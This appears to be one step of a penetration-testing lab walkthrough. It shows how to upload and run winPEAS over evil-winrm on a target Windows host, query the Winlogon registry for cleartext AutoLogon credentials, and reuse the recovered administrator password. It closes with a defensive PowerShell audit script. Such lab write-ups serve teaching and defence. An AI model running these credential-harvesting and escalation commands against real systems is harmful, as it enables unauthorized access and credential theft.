12. Enumerate Local Privileges and AutoLogon


We're now in the post-exploitation phase with access to the system as sysadmin. Our goal is privilege escalation — gaining full control (Administrator or SYSTEM access).

🔧 Step-by-Step: Run winPEASx64.exe to Find PrivEsc Vectors:

1. 📁 Upload winPEASx64.exe to the target via evil-winrm

From your Kali machine, in the same folder where winPEASx64.exe is saved:

evil-winrm -i 192.168.10.4 -u 'sysadmin' -p 'NewPassword123'

Once inside the shell:

upload winPEASx64.exe

It will upload the file to the current directory (usually C:\Users\sysadmin\).


2. 🧠 Run winPEASx64.exe inside the shell

After upload completes, run:

.\winPEASx64.exe

Let it run fully — it will check:

  • 🔐 Stored credentials (AutoLogon, saved RDP passwords, etc.)

  • ⚙️ Misconfigured services (e.g., unquoted paths)

  • 📦 Files with weak permissions

  • 🔼 PrivEsc misconfigs (AlwaysInstallElevated, etc.)


3. 🔍 Look for These in Output

Pay attention to:

  • AutoLogon credentials ➜ cleartext passwords

  • AlwaysInstallElevated ➜ lets any user install MSI as SYSTEM

  • Unquoted service paths ➜ exploitable services

  • Writable services ➜ can hijack a service

  • Credential files in registry or config folders

To get AutoLogon Credentials (manually via WinRM)

Once you're inside using evil-winrm:

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Look for these keys in the output:

  • DefaultUserName

  • DefaultPassword ← this is what you want!

  • AutoAdminLogon (should be set to 1 if enabled)

The AutoLogon password configured for the administrator user is:

d0m@in_c0ntr0ll3r

📌 Found in these registry values:

DefaultUserName    REG_SZ    administrator
DefaultPassword    REG_SZ    d0m@in_c0ntr0ll3r

So the full AutoLogon credentials are:

  • Username: administrator

  • Password: d0m@in_c0ntr0ll3r

We can now try using these credentials for SMB, WinRM, or any service that accepts domain login.
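The same Winlogon key is what a defender should be auditing. As an added example that is not part of this lab (the Test-AutoLogonExposure function name and its output fields are my own), this PowerShell check reports whether a host stores a cleartext DefaultPassword and can optionally remove that value; it assumes it is run as a local administrator.

```powershell
# Added example (defender's audit), not part of the lab: report whether the
# Winlogon AutoLogon configuration on this host leaves a cleartext password
# in the registry, and optionally strip that value. Run as an administrator.
function Test-AutoLogonExposure {
    [CmdletBinding()]
    param(
        # Remove the cleartext DefaultPassword value when one is found.
        [switch]$Remediate
    )

    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $props = Get-ItemProperty -Path $key -ErrorAction Stop

    # AutoAdminLogon is a REG_SZ holding "1" when automatic logon is enabled.
    $enabled = ($props.AutoAdminLogon -eq '1')
    $hasClearText = -not [string]::IsNullOrEmpty($props.DefaultPassword)

    $result = [pscustomobject]@{
        ComputerName      = $env:COMPUTERNAME
        AutoLogonEnabled  = $enabled
        DefaultDomainName = $props.DefaultDomainName
        DefaultUserName   = $props.DefaultUserName
        ClearTextPassword = $hasClearText
        Remediated        = $false
        Finding           = $null
    }

    if ($hasClearText) {
        # Every local user can read this key, so the password is exposed to
        # anyone with a shell on the box, exactly as the reg query above shows.
        $result.Finding = "Cleartext AutoLogon password stored for '$($props.DefaultUserName)'"
        if ($Remediate) {
            Remove-ItemProperty -Path $key -Name 'DefaultPassword' -ErrorAction Stop
            $result.Remediated = $true
        }
    }
    elseif ($enabled) {
        $result.Finding = 'AutoLogon enabled without a registry DefaultPassword (verify the LSA-secret configuration)'
    }
    else {
        $result.Finding = 'AutoLogon not configured'
    }

    return $result
}

# Audit only; add -Remediate to drop the cleartext value once automatic logon
# is no longer required, or after moving the password into an LSA secret with
# the Sysinternals Autologon tool instead of a plain registry string.
Test-AutoLogonExposure | Format-List
```

Running it across a fleet (for example through Invoke-Command) turns the single reg query into a repeatable finding that can be ticketed before an attacker reaches this step.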